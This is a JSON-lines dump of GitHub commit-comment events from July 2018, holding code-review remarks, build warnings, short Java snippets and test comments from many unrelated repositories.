{"id":"8002042370","type":"CommitCommentEvent","actor":{"login":"YoungAndyw"},"repo":{"name":"Javen205/SSM"},"payload":{"comment":{"id":29796386,"position":48,"line":48,"path":"src/main/java/com/javen/controller/UserController.java","commit_id":"eb1facc961fa613abb4aecd755467c2364d46d24","created_at":"2018-07-23T06:58:39Z","updated_at":"2018-07-23T06:58:39Z","author_association":"NONE","body":"{"}},"created_at":"2018-07-23T06:58:39Z"}
{"id":"8002042997","type":"CommitCommentEvent","actor":{"login":"YoungAndyw"},"repo":{"name":"Javen205/SSM"},"payload":{"comment":{"id":29796387,"position":48,"line":48,"path":"src/main/java/com/javen/controller/UserController.java","commit_id":"eb1facc961fa613abb4aecd755467c2364d46d24","created_at":"2018-07-23T06:58:49Z","updated_at":"2018-07-23T06:58:49Z","author_association":"NONE","body":"}"}},"created_at":"2018-07-23T06:58:49Z"}
{"id":"8002043593","type":"CommitCommentEvent","actor":{"login":"PierreRambaud"},"repo":{"name":"PrestaShop/PrestaShop"},"payload":{"comment":{"id":29796388,"position":8,"line":124,"path":"classes/Rijndael.php","commit_id":"b07763d666b3d9231e60d622a5c656cbb56f9d52","created_at":"2018-07-23T06:59:00Z","updated_at":"2018-07-23T06:59:00Z","author_association":"CONTRIBUTOR","body":"There's a Waiting PR : https://github.com/PrestaShop/PrestaShop/pull/9251, you can apply the patch if you don't want to wait."}},"created_at":"2018-07-23T06:59:00Z"}
{"id":"8002045302","type":"CommitCommentEvent","actor":{"login":"biswesh456"},"repo":{"name":"JOSM/pt_assistant"},"payload":{"comment":{"id":29796390,"position":null,"line":null,"path":null,"commit_id":"6dfb5aa3d438d3035197fc8750a4bdf3b06e7c82","created_at":"2018-07-23T06:59:28Z","updated_at":"2018-07-23T06:59:28Z","author_association":"COLLABORATOR","body":"Most of the improvements are based on the suggestions provided by @michaelzangl in 0ed0fce3367655d968fc3abe2033ed96deaff2ce"}},"created_at":"2018-07-23T06:59:28Z"}
{"id":"8002054043","type":"CommitCommentEvent","actor":{"login":"mynukeviet"},"repo":{"name":"huuthoqt1994/lynx"},"payload":{"comment":{"id":29796405,"position":4,"line":30,"path":"modules/invoice/site.functions.php","commit_id":"c4a613fdfa9cedd2a9da09103421b2cc8fae2bdb","created_at":"2018-07-23T07:01:44Z","updated_at":"2018-07-23T07:01:44Z","author_association":"NONE","body":"Đoạn ni lấy danh sách sản phẩm + dịch vụ, em comment đi rồi hắn lỗi ý. Tìm cách để sửa cái lỗi không hiểu trường `weight`"}},"created_at":"2018-07-23T07:01:44Z"}
{"id":"8002055489","type":"CommitCommentEvent","actor":{"login":"gthboftiger"},"repo":{"name":"gthboftiger/myRepository"},"payload":{"comment":{"id":29796413,"position":null,"line":null,"path":null,"commit_id":"852ff72fd66b33f1ec0ed6583d1ae2732972f371","created_at":"2018-07-23T07:02:07Z","updated_at":"2018-07-23T07:02:07Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-23T07:02:07Z"}
{"id":"8002055796","type":"CommitCommentEvent","actor":{"login":"fuckomako"},"repo":{"name":"htmlacademy-htmlcss/806611-gllacy"},"payload":{"comment":{"id":29796415,"position":null,"line":null,"path":null,"commit_id":"507553bd34f39d7b895b720eb0d23ad7e6704528","created_at":"2018-07-23T07:02:12Z","updated_at":"2018-07-23T07:02:12Z","author_association":"COLLABORATOR","body":"Все верно ты задал max-width"}},"created_at":"2018-07-23T07:02:12Z"}
{"id":"8002061814","type":"CommitCommentEvent","actor":{"login":"mynukeviet"},"repo":{"name":"huuthoqt1994/lynx"},"payload":{"comment":{"id":29796426,"position":5,"line":20,"path":"modules/projects/funcs/main.php","commit_id":"c4a613fdfa9cedd2a9da09103421b2cc8fae2bdb","created_at":"2018-07-23T07:03:47Z","updated_at":"2018-07-23T07:03:47Z","author_association":"NONE","body":"Code bỏ dưới header không có ý nghĩa, gặp header thì hắn chuyển trang rồi không chạy xuống đây được"}},"created_at":"2018-07-23T07:03:47Z"}
{"id":"8002064806","type":"CommitCommentEvent","actor":{"login":"fuckomako"},"repo":{"name":"htmlacademy-htmlcss/806611-gllacy"},"payload":{"comment":{"id":29796431,"position":null,"line":null,"path":null,"commit_id":"507553bd34f39d7b895b720eb0d23ad7e6704528","created_at":"2018-07-23T07:04:36Z","updated_at":"2018-07-23T07:04:36Z","author_association":"COLLABORATOR","body":"Для элементов списка  li(желательно задать класс). Например footer-social__item и footer-info__item"}},"created_at":"2018-07-23T07:04:36Z"}
{"id":"8002067293","type":"CommitCommentEvent","actor":{"login":"HariomKesh"},"repo":{"name":"icherniukh/NFC-Class-Extension-Driver"},"payload":{"comment":{"id":29796433,"position":13,"line":51,"path":"libs/NfcCoreLib/lib/Nci/phNciNfc_Context.c","commit_id":"53c48226cec102b7d2371eeacf9f98b764b052bd","created_at":"2018-07-23T07:05:16Z","updated_at":"2018-07-23T07:05:16Z","author_association":"NONE","body":"1>..\\phNciNfc_Context.c(52): warning C4054: 'type cast': from function pointer 'pphNciNfc_IfNotificationCb_t' to data pointer 'void *'"}},"created_at":"2018-07-23T07:05:16Z"}
{"id":"8002070935","type":"CommitCommentEvent","actor":{"login":"NISHITZA"},"repo":{"name":"NISHITZA/Hello_world"},"payload":{"comment":{"id":29796440,"position":null,"line":null,"path":null,"commit_id":"5c3a389262e68658016d161ec23aca2722b267c8","created_at":"2018-07-23T07:06:16Z","updated_at":"2018-07-23T07:06:16Z","author_association":"OWNER","body":"trial"}},"created_at":"2018-07-23T07:06:16Z"}
{"id":"8002071437","type":"CommitCommentEvent","actor":{"login":"HariomKesh"},"repo":{"name":"icherniukh/NFC-Class-Extension-Driver"},"payload":{"comment":{"id":29796443,"position":20,"line":58,"path":"libs/NfcCoreLib/lib/Nci/phNciNfc_Context.c","commit_id":"53c48226cec102b7d2371eeacf9f98b764b052bd","created_at":"2018-07-23T07:06:24Z","updated_at":"2018-07-23T07:06:24Z","author_association":"NONE","body":"build error - \r\n1>..\\phNciNfc_Context.c(58): warning C4054: 'type cast': from function pointer 'pphNciNfc_IfNotificationCb_t' to data pointer 'void *'"}},"created_at":"2018-07-23T07:06:24Z"}
{"id":"8002078174","type":"CommitCommentEvent","actor":{"login":"ypafeuer"},"repo":{"name":"ypafeuer/java"},"payload":{"comment":{"id":29796456,"position":null,"line":null,"path":null,"commit_id":"0813a1643bf6174513291d7345377e28d9ba7313","created_at":"2018-07-23T07:08:15Z","updated_at":"2018-07-23T07:08:15Z","author_association":"OWNER","body":"```java\r\n\r\npackage javaapplication10;\r\n\r\npublic class simple {\r\n    public float price;\r\n    public static void main(String[] args) {\r\n        simple price=new simple();\r\n        price.price=4; \r\n    }\r\n    \r\n}\r\n\r\n```"}},"created_at":"2018-07-23T07:08:15Z"}
{"id":"8002078255","type":"CommitCommentEvent","actor":{"login":"mynukeviet"},"repo":{"name":"huuthoqt1994/lynx"},"payload":{"comment":{"id":29796457,"position":21,"line":61,"path":"modules/workreport/funcs/main.php","commit_id":"c4a613fdfa9cedd2a9da09103421b2cc8fae2bdb","created_at":"2018-07-23T07:08:16Z","updated_at":"2018-07-23T07:08:16Z","author_association":"NONE","body":"Chổ ni như trường hợp khi sáng anh có nói, phải để xuống chổ đã xử lý thành công ý"}},"created_at":"2018-07-23T07:08:16Z"}
{"id":"8002079450","type":"CommitCommentEvent","actor":{"login":"ashishchoure"},"repo":{"name":"ashishchoure/GITHUBSAMPLE"},"payload":{"comment":{"id":29796461,"position":4,"line":10,"path":"index.html","commit_id":"18eea24cdaac2dcea966775c6ef549e4a8f91ed8","created_at":"2018-07-23T07:08:35Z","updated_at":"2018-07-23T07:08:35Z","author_association":"OWNER","body":"@sumitzarkar "}},"created_at":"2018-07-23T07:08:35Z"}
{"id":"8002083028","type":"CommitCommentEvent","actor":{"login":"conartist6"},"repo":{"name":"sithmel/iter-tools"},"payload":{"comment":{"id":29796466,"position":null,"line":null,"path":null,"commit_id":"4892406713eabbe08e3250033b8f60caf8ffb7be","created_at":"2018-07-23T07:09:26Z","updated_at":"2018-07-23T07:09:26Z","author_association":"COLLABORATOR","body":"Oops, nice, not sure how I missed those."}},"created_at":"2018-07-23T07:09:26Z"}
{"id":"8002083726","type":"CommitCommentEvent","actor":{"login":"ypafeuer"},"repo":{"name":"ypafeuer/java"},"payload":{"comment":{"id":29796470,"position":null,"line":null,"path":null,"commit_id":"0813a1643bf6174513291d7345377e28d9ba7313","created_at":"2018-07-23T07:09:38Z","updated_at":"2018-07-23T07:09:38Z","author_association":"OWNER","body":"```java\r\npackage javaapplication7;\r\nimport java.util.HashMap;\r\nimport java.util.Iterator;\r\nimport java.util.TreeSet;\r\npublic class Java01 {\r\n  public static void main(String args[]) {\r\n   TreeSet<Integer> IntTS = new TreeSet<>();\r\n    for (int i=1;i<=100;i++) \r\n      IntTS.add(new Integer(i));\r\n    System.out.println(\"初始集合大小為：\" + IntTS.size());\r\n       Iterator i=IntTS.iterator();\r\n    while (i.hasNext()) \r\n      if (((Integer)i.next()).intValue()%9 != 0)\r\n        i.remove(); \r\n    System.out.println(\"最後集合的內容為：\" + IntTS);\r\n  }\r\n}\r\n\r\n```"}},"created_at":"2018-07-23T07:09:38Z"}
{"id":"8002087734","type":"CommitCommentEvent","actor":{"login":"aclowkey"},"repo":{"name":"tiangolo/uwsgi-nginx-docker"},"payload":{"comment":{"id":29796474,"position":null,"line":null,"path":null,"commit_id":"33ee9b11770f3b4f17b5405437fa10ceb8b207c3","created_at":"2018-07-23T07:10:39Z","updated_at":"2018-07-23T07:10:39Z","author_association":"NONE","body":"How are the environment variables being used? "}},"created_at":"2018-07-23T07:10:39Z"}
{"id":"8002091504","type":"CommitCommentEvent","actor":{"login":"Soulofdestiny"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29796482,"position":null,"line":null,"path":null,"commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-23T07:11:37Z","updated_at":"2018-07-23T07:11:37Z","author_association":"OWNER","body":"yeah - I've rechecked that... and unfortunately the fatal flag does not work on s390x due to the lack of the possibility to load snapshots...\r\nsorry for the wrong information.\r\n\r\nAdditional possibility would be to have a dedicated z/VM worker which gots installed once and then start the tests based on this system by using `BOOT_EXISTING_S390`"}},"created_at":"2018-07-23T07:11:37Z"}
{"id":"8002100868","type":"CommitCommentEvent","actor":{"login":"gwen-soleil"},"repo":{"name":"tango-controls/JTango"},"payload":{"comment":{"id":29796503,"position":149,"line":240,"path":"server/src/main/java/org/tango/server/dynamic/DynamicManager.java","commit_id":"b8ac04edffdee715518b54bf93dd7e1994de5c9c","created_at":"2018-07-23T07:14:03Z","updated_at":"2018-07-23T07:14:03Z","author_association":"COLLABORATOR","body":"Ok, thanks!"}},"created_at":"2018-07-23T07:14:03Z"}
{"id":"8002107599","type":"CommitCommentEvent","actor":{"login":"danielkerr"},"repo":{"name":"opencart/opencart"},"payload":{"comment":{"id":29796522,"position":null,"line":null,"path":null,"commit_id":"3d25cf3fb796a81f282db25bce319e2f0449028c","created_at":"2018-07-23T07:15:46Z","updated_at":"2018-07-23T07:15:46Z","author_association":"CONTRIBUTOR","body":"because the current stable release is 5.4 and i think i will have to many complaints if 5.6 is not supported even though php will end this version in December."}},"created_at":"2018-07-23T07:15:46Z"}
{"id":"8002108269","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29796524,"position":1,"line":1,"path":"BankManagement/BankManagement/fileUtils.c","commit_id":"a5900bce2805615367d68774e72fe0941230467a","created_at":"2018-07-23T07:15:57Z","updated_at":"2018-07-23T07:15:57Z","author_association":"NONE","body":"Why? Leave a comment here if this define actually needed"}},"created_at":"2018-07-23T07:15:57Z"}
{"id":"8002108579","type":"CommitCommentEvent","actor":{"login":"Andarist"},"repo":{"name":"bvaughn/react-window"},"payload":{"comment":{"id":29796526,"position":32,"line":55,"path":"package.json","commit_id":"86f052916df4374c3c3be8cc2779f3087a8475be","created_at":"2018-07-23T07:16:02Z","updated_at":"2018-07-23T07:16:02Z","author_association":"CONTRIBUTOR","body":"@bvaughn would be good to add lint-staged rule catching `package.json`"}},"created_at":"2018-07-23T07:16:02Z"}
{"id":"8002112364","type":"CommitCommentEvent","actor":{"login":"dukesky"},"repo":{"name":"dukesky/Data-Incubator"},"payload":{"comment":{"id":29796530,"position":null,"line":null,"path":null,"commit_id":"a0af16ad73709cd642bfac5ab74f8b18334e8f42","created_at":"2018-07-23T07:16:58Z","updated_at":"2018-07-23T07:16:58Z","author_association":"OWNER","body":"1st Plot, it's a ROC curve for the logistic regression model, it's ACC value is 0.9420, which is really close to 1, means it's a good predictor."}},"created_at":"2018-07-23T07:16:58Z"}
{"id":"8002112732","type":"CommitCommentEvent","actor":{"login":"pSub"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29796531,"position":null,"line":null,"path":null,"commit_id":"6739f69af00a6c3e8639589a10f67f1d5d3df742","created_at":"2018-07-23T07:17:05Z","updated_at":"2018-07-23T07:17:05Z","author_association":"MEMBER","body":"Agreed. This was too error prone. I'll use a PR next time."}},"created_at":"2018-07-23T07:17:05Z"}
{"id":"8002114052","type":"CommitCommentEvent","actor":{"login":"Simkyu"},"repo":{"name":"Simkyu/algo_baek"},"payload":{"comment":{"id":29796534,"position":null,"line":null,"path":null,"commit_id":"34725eb004abce7aeaecc0c50ab03d013c298211","created_at":"2018-07-23T07:17:24Z","updated_at":"2018-07-23T07:17:24Z","author_association":"OWNER","body":"메모리 사용률, 시간이 너무 오래 걸려서 개선해볼 필요가 있어보임."}},"created_at":"2018-07-23T07:17:24Z"}
{"id":"8002115637","type":"CommitCommentEvent","actor":{"login":"IanSavchenko"},"repo":{"name":"tobiipro/aws-util-firecloud"},"payload":{"comment":{"id":29796538,"position":null,"line":null,"path":null,"commit_id":"2609838142d311a9640e554f56a2b5b773d60525","created_at":"2018-07-23T07:17:49Z","updated_at":"2018-07-23T07:17:49Z","author_association":"CONTRIBUTOR","body":"Hello, Andrei :)\r\n> if something goes bad, there's no execution time report printed; the previous version is not JUST a time report but also a log of \"x started\" followed by maybe \"x finished in \" or \"error\"\r\n\r\nI don't think I agree. Started and Finished logs stay, they are printed by something else (AWS?)\r\nHere is how it looks without time report: \r\n```\r\n12:53:05\r\nSTART RequestId: d7583df4-8c1b-11e8-ad70-a115642f1655 Version: $LATEST\r\n\r\n12:53:05\r\nEND RequestId: d7583df4-8c1b-11e8-ad70-a115642f1655\r\n\r\n12:53:05\r\nREPORT RequestId: d7583df4-8c1b-11e8-ad70-a115642f1655\tDuration: 463.65 ms\tBilled Duration: 500 ms Memory Size: 1024 MB\tMax Memory Used: 64 MB\r\n```\r\n> when an env/prod lambda crashes you won't see anything beyond \"error\", when maybe it is helpful to know that fetching the context took 99% of the time allocated to the lambda, not that the \"fn\" code timed out; and knowing where and when the lambda crashed in env/prod was the only reason why this code is written as it was\r\n\r\nI see what you mean. I guess, I can leave 2 log messages in lambda bootstrap and express bootstrap just before running fn code with \"info\" level. They will carry timestamp and it will be easy to see if something failed even before running fn code. \r\n\r\nI did this change not just because it's summer and I'm bored :) I noticed that every time I was digging into logs to find what was the cause of the problem, all these \"fetching ctx...\" logs were not helpful since this mechanism works like a Swiss clockwork. But:\r\n1) It's hard to visually locate where are the useful logs\r\n2) it influenced the performance of AWS log viewer (we should not care about it, ofc, but the fact is fact). Once, due to the number of logs in one of the log groups (lambda/prod/atex-events) search and enumeration of log streams stopped working completely until I removed and recreated this logs group. AWS support couldn't help and that's the only option I had. And that's not cool, because I lost relevant logs. It's not our fault, but that's a reality."}},"created_at":"2018-07-23T07:17:49Z"}
{"id":"8002118092","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29796541,"position":49,"line":48,"path":"BankManagement/BankManagement/fileUtils.c","commit_id":"a5900bce2805615367d68774e72fe0941230467a","created_at":"2018-07-23T07:18:28Z","updated_at":"2018-07-23T07:18:28Z","author_association":"NONE","body":"Why + 35? What that means? It's preferable to NOT HARD CODE magic numbers. Search for magic numbers in Google and read why it's bad..."}},"created_at":"2018-07-23T07:18:28Z"}
{"id":"8002118689","type":"CommitCommentEvent","actor":{"login":"ypafeuer"},"repo":{"name":"ypafeuer/java"},"payload":{"comment":{"id":29796542,"position":null,"line":null,"path":null,"commit_id":"0813a1643bf6174513291d7345377e28d9ba7313","created_at":"2018-07-23T07:18:38Z","updated_at":"2018-07-23T07:18:38Z","author_association":"OWNER","body":"````java\r\n\r\npackage javaapplication10;\r\n\r\npublic class simple {\r\n    public float price; //non-static \r\n    public static void main(String[] args) {\r\n        simple xx=new simple();\r\n        price=4; \r\n        /*\r\n         Class 未被初始化(New instance)以前\r\n        static method只能存取static variable 與 local variable\r\n        */\r\n        /*\r\n        Class 未被初始化(New instance)以前\r\n        static method(如main)不能呼叫non-static的method。\r\n        */\r\n    }\r\n    public void qq(){\r\n        price=4; \r\n    }\r\n    \r\n}\r\n\r\n````"}},"created_at":"2018-07-23T07:18:38Z"}
{"id":"8002123821","type":"CommitCommentEvent","actor":{"login":"gstein"},"repo":{"name":"apache/infrastructure-puppet"},"payload":{"comment":{"id":29796548,"position":19,"line":91,"path":"modules/jenkins_asf/files/delete-workspace-disabled-jobs.sh","commit_id":"c8b121460ffd0a337d3977043e3a5f859ff06683","created_at":"2018-07-23T07:19:55Z","updated_at":"2018-07-23T07:19:55Z","author_association":"MEMBER","body":"The echo string needs to remove the second \"run\", and s/exit1/exit 1/"}},"created_at":"2018-07-23T07:19:55Z"}
{"id":"8002125933","type":"CommitCommentEvent","actor":{"login":"Richagupta0401"},"repo":{"name":"Richagupta0401/richagupta0401.github.io"},"payload":{"comment":{"id":29796553,"position":null,"line":null,"path":null,"commit_id":"4f2b40eac442aefd21fe12a0f7f04cffdcf8369d","created_at":"2018-07-23T07:20:25Z","updated_at":"2018-07-23T07:20:25Z","author_association":"OWNER","body":"ff"}},"created_at":"2018-07-23T07:20:25Z"}
{"id":"8002126270","type":"CommitCommentEvent","actor":{"login":"Richagupta0401"},"repo":{"name":"Richagupta0401/richagupta0401.github.io"},"payload":{"comment":{"id":29796554,"position":null,"line":null,"path":null,"commit_id":"4f2b40eac442aefd21fe12a0f7f04cffdcf8369d","created_at":"2018-07-23T07:20:30Z","updated_at":"2018-07-23T07:20:30Z","author_association":"OWNER","body":"vv"}},"created_at":"2018-07-23T07:20:30Z"}
{"id":"8002127032","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29796555,"position":null,"line":null,"path":null,"commit_id":"5c9dd3f3939bfc7929fdf213ef6f89044f3e6e98","created_at":"2018-07-23T07:20:42Z","updated_at":"2018-07-23T07:20:42Z","author_association":"NONE","body":"The situation about which overload PR will be merged, and in what order, is still unclear at this point"}},"created_at":"2018-07-23T07:20:42Z"}
{"id":"8002129310","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29796560,"position":5,"line":28,"path":"CHANGELOG.zh-CN.md","commit_id":"0337b698932e0d3e55578e9a2ce7727277befa0a","created_at":"2018-07-23T07:21:16Z","updated_at":"2018-07-23T07:21:16Z","author_association":"MEMBER","body":"提到第一条。\r\n\r\n注意同步修改 releases 里的 changelog。"}},"created_at":"2018-07-23T07:21:16Z"}
{"id":"8002131347","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29796564,"position":null,"line":null,"path":null,"commit_id":"d775cca5a9dd2cfafdc4f9e8ab1d2849eea3495e","created_at":"2018-07-23T07:21:47Z","updated_at":"2018-07-23T07:21:47Z","author_association":"NONE","body":"Congrats too! :-)"}},"created_at":"2018-07-23T07:21:47Z"}
{"id":"8002164271","type":"CommitCommentEvent","actor":{"login":"jayarjo"},"repo":{"name":"jayarjo/mobx-state-tree"},"payload":{"comment":{"id":29796622,"position":27,"line":173,"path":"packages/mobx-state-tree/src/types/complex-types/model.ts","commit_id":"4db512c6a1864d70af8d98a5c55c0f7924ae28fd","created_at":"2018-07-23T07:29:45Z","updated_at":"2018-07-23T07:29:45Z","author_association":"OWNER","body":"Ignore the obviously invalid type here."}},"created_at":"2018-07-23T07:29:45Z"}
{"id":"8002166107","type":"CommitCommentEvent","actor":{"login":"Piiit"},"repo":{"name":"idm-suedtirol/bdp-core"},"payload":{"comment":{"id":29796624,"position":13,"line":47,"path":"ws-interface/src/main/java/it/bz/idm/bdp/ws/RestController.java","commit_id":"2d1246ab8ca7f2937c9f34fb2b44e460492436b8","created_at":"2018-07-23T07:30:11Z","updated_at":"2018-07-23T07:30:11Z","author_association":"CONTRIBUTOR","body":"@stefanodavid This is the same as \"NAME_PARAM\", but historically they somehow have been two different names. We need to change that for APIv2, but currently we must stick to them, due to incompatibilities with running services."}},"created_at":"2018-07-23T07:30:11Z"}
{"id":"8002169372","type":"CommitCommentEvent","actor":{"login":"romkatv"},"repo":{"name":"romkatv/hcproxy"},"payload":{"comment":{"id":29796631,"position":9,"line":9,"path":"time.h","commit_id":"0c52f01ff136f1897bdf0bfb691b4a6696759810","created_at":"2018-07-23T07:30:54Z","updated_at":"2018-07-23T07:30:54Z","author_association":"OWNER","body":"Of course! Fixed."}},"created_at":"2018-07-23T07:30:54Z"}
{"id":"8002170322","type":"CommitCommentEvent","actor":{"login":"tsunami19"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29796632,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T07:31:06Z","updated_at":"2018-07-23T07:31:06Z","author_association":"NONE","body":"Amazing Project and great team !"}},"created_at":"2018-07-23T07:31:06Z"}
{"id":"8002170519","type":"CommitCommentEvent","actor":{"login":"Aiolos13"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29796633,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T07:31:08Z","updated_at":"2018-07-23T07:31:08Z","author_association":"NONE","body":"Nice project"}},"created_at":"2018-07-23T07:31:08Z"}
{"id":"8002178618","type":"CommitCommentEvent","actor":{"login":"lia3IL"},"repo":{"name":"lia3IL/Website-Project"},"payload":{"comment":{"id":29796647,"position":null,"line":null,"path":null,"commit_id":"fcb0f65aa73ec5d108008d170d92daefa9dd8317","created_at":"2018-07-23T07:32:56Z","updated_at":"2018-07-23T07:32:56Z","author_association":"OWNER","body":"kl"}},"created_at":"2018-07-23T07:32:56Z"}
{"id":"8002178870","type":"CommitCommentEvent","actor":{"login":"Piiit"},"repo":{"name":"idm-suedtirol/bdp-core"},"payload":{"comment":{"id":29796649,"position":16,"line":50,"path":"ws-interface/src/main/java/it/bz/idm/bdp/ws/RestController.java","commit_id":"2d1246ab8ca7f2937c9f34fb2b44e460492436b8","created_at":"2018-07-23T07:33:00Z","updated_at":"2018-07-23T07:33:00Z","author_association":"CONTRIBUTOR","body":"This does not explain what it is used for, that it is a number of type integer is already visible from the meta data. Better describe, that it is a filter saying \"I want all data from the past X seconds until now.\" Maybe, you could rephrase that into a better sentence :-)"}},"created_at":"2018-07-23T07:33:00Z"}
{"id":"8002180716","type":"CommitCommentEvent","actor":{"login":"Piiit"},"repo":{"name":"idm-suedtirol/bdp-core"},"payload":{"comment":{"id":29796654,"position":17,"line":51,"path":"ws-interface/src/main/java/it/bz/idm/bdp/ws/RestController.java","commit_id":"2d1246ab8ca7f2937c9f34fb2b44e460492436b8","created_at":"2018-07-23T07:33:28Z","updated_at":"2018-07-23T07:33:28Z","author_association":"CONTRIBUTOR","body":"What interval? For what is it used?"}},"created_at":"2018-07-23T07:33:28Z"}
{"id":"8002184894","type":"CommitCommentEvent","actor":{"login":"uguruysal0"},"repo":{"name":"uguruysal0/telegramalgoritmabot"},"payload":{"comment":{"id":29796664,"position":null,"line":null,"path":null,"commit_id":"62efd62b09802102838c88e21e8c5a78ae37e97c","created_at":"2018-07-23T07:34:27Z","updated_at":"2018-07-23T07:34:27Z","author_association":"OWNER","body":"typonun dosya adinda oldugunu anlamayinca ben "}},"created_at":"2018-07-23T07:34:27Z"}
{"id":"8002191157","type":"CommitCommentEvent","actor":{"login":"IlyaSergeyev"},"repo":{"name":"IlyaSergeyev/MediaSDK"},"payload":{"comment":{"id":29796681,"position":4,"line":22,"path":"_studio/mfx_lib/genx/copy_kernels/src/genx_cht_copy_isa.cpp","commit_id":"ef966fb11120920fa93b3e049b8fda92967ca0eb","created_at":"2018-07-23T07:35:52Z","updated_at":"2018-07-23T07:35:52Z","author_association":"OWNER","body":"It was made to keep working of library with only this commit, without other changes in cmake files."}},"created_at":"2018-07-23T07:35:52Z"}
{"id":"8002197192","type":"CommitCommentEvent","actor":{"login":"positiveneutron"},"repo":{"name":"pptik/absensi-machine-mqtt-esp8266"},"payload":{"comment":{"id":29796693,"position":null,"line":null,"path":null,"commit_id":"4d98fe3d2cff65420d3956b0b16ea8a1cf406feb","created_at":"2018-07-23T07:37:16Z","updated_at":"2018-07-23T07:37:16Z","author_association":"MEMBER","body":"Mantap gan! akhirnya commit lagi"}},"created_at":"2018-07-23T07:37:16Z"}
{"id":"8002203968","type":"CommitCommentEvent","actor":{"login":"aparcar"},"repo":{"name":"aparcar/attendedsysupgrade-server"},"payload":{"comment":{"id":29796695,"position":58,"line":52,"path":"server/request.py","commit_id":"e3d5195e9df902d0245f34fe412cde08901d1b4e","created_at":"2018-07-23T07:38:54Z","updated_at":"2018-07-23T07:38:54Z","author_association":"OWNER","body":"should be `not sysupgrade_supported`"}},"created_at":"2018-07-23T07:38:54Z"}
{"id":"8002207256","type":"CommitCommentEvent","actor":{"login":"aparcar"},"repo":{"name":"aparcar/attendedsysupgrade-server"},"payload":{"comment":{"id":29796698,"position":52,"line":56,"path":"server/build_request.py","commit_id":"e3d5195e9df902d0245f34fe412cde08901d1b4e","created_at":"2018-07-23T07:39:38Z","updated_at":"2018-07-23T07:39:38Z","author_association":"OWNER","body":"move this up as required in line 29"}},"created_at":"2018-07-23T07:39:38Z"}
{"id":"8002212529","type":"CommitCommentEvent","actor":{"login":"xuhaopei"},"repo":{"name":"xuhaopei/web"},"payload":{"comment":{"id":29796705,"position":null,"line":null,"path":null,"commit_id":"87cdb1962e69f0cfed2702d819428df17b19954f","created_at":"2018-07-23T07:40:51Z","updated_at":"2018-07-23T07:40:51Z","author_association":"OWNER","body":"6"}},"created_at":"2018-07-23T07:40:51Z"}
{"id":"8002212877","type":"CommitCommentEvent","actor":{"login":"stormi"},"repo":{"name":"xcp-ng-rpms/qemu-dp"},"payload":{"comment":{"id":29796706,"position":4,"line":104,"path":"SPECS/qemu-dp.spec","commit_id":"e19b6baa89f5a42253aa6b0575c85f1ce4a8724b","created_at":"2018-07-23T07:40:55Z","updated_at":"2018-07-23T07:40:55Z","author_association":"CONTRIBUTOR","body":"Is it a patch that you can also submit to qemu directly?"}},"created_at":"2018-07-23T07:40:55Z"}
{"id":"8002214582","type":"CommitCommentEvent","actor":{"login":"seolhanKim"},"repo":{"name":"l4zyg33k/Microservices4ModernCommerce"},"payload":{"comment":{"id":29796712,"position":1,"line":1,"path":"03-chapter3.markdown","commit_id":"a1dd4a1588b6888cb79fb665905ecc63091c63ce","created_at":"2018-07-23T07:41:19Z","updated_at":"2018-07-23T07:41:19Z","author_association":"NONE","body":"**Level 3: HATEOAS (Hypertext As The Engine Of Application State)**\r\n  Level3는 REST인터페이스 처리 레벨 중 가장 완성된 상태의 형식입니다. Level 3은 HTTP동사를 완전히 사용하고, URI로 객체를 식별하며, 프로그래밍 방식으로 객체들과 상호 작용할 지침을 제공합니다. API는 자동문서화되어 API와 API호출자의 상호 작용을 쉽게 하며, 그에 대한 정보 은닉도 제공 합니다. 이러한 형태의 자기문서화로 서버가 클라이언트 손상없이 URI들을 변경할 수 있습니다\r\n\r\n> Level 3/HATEOAS 는 실제 실행 시, 사용하기가 매우 어렵습니다. API와 API소비자의 작성은 어렵지만, 그 원칙들은 따를 가치가 있습니다. \r\n\r\n인벤토리 예시로 돌아갑시다. 인벤토리 객체를 조회하기위해서, 당신은 아래와 같이 호출해야 합니다 :\r\n`GET /Inventory/product12345`\r\n\r\n그리고 당신이 응답 받는 것은 이와 같습니다 :\r\n```\r\n200 OK\r\n<inventory level=\"84\">\r\n<link rel=\"Inventory.reserveInventory\" href=\"/Inventory/reserveInventory\" />\r\n<link rel=\"Inventory.queryInventory\" href=\"/Inventory/queryInventory\" />\r\n<link rel=\"Inventory.deleteInventory\" href=\"/Inventory/deleteInventory\" />\r\n<link rel=\"Inventory.newInventory\" href=\"/Inventory/newInventory\" />\r\n</inventory>\r\n\r\n```\r\n응답에는 인벤토리 개체에 사용 가능한 모든 작업 수행 법을 알려 주는 링크 태그가 포함됩니다. API 호출자는 인벤토리에 대해 알아야할 필요가 있으며, [인벤토리점유] 키를 사용하여 URL을 조회할 수 있습니다 (_/Inventory/reserveInventory_). Level 3 준수를 위해 노력은 하지만, 높은 수준이니 부족해도 걱정하지 마십시오.\r\n"}},"created_at":"2018-07-23T07:41:19Z"}
{"id":"8002216150","type":"CommitCommentEvent","actor":{"login":"schwabdidier"},"repo":{"name":"schwabdidier/GazePlay"},"payload":{"comment":{"id":29796715,"position":null,"line":null,"path":null,"commit_id":"5e69e8409331185bd5f145807b75455b56ca8120","created_at":"2018-07-23T07:41:40Z","updated_at":"2018-07-23T07:41:40Z","author_association":"OWNER","body":"resolve issue #566 "}},"created_at":"2018-07-23T07:41:40Z"}
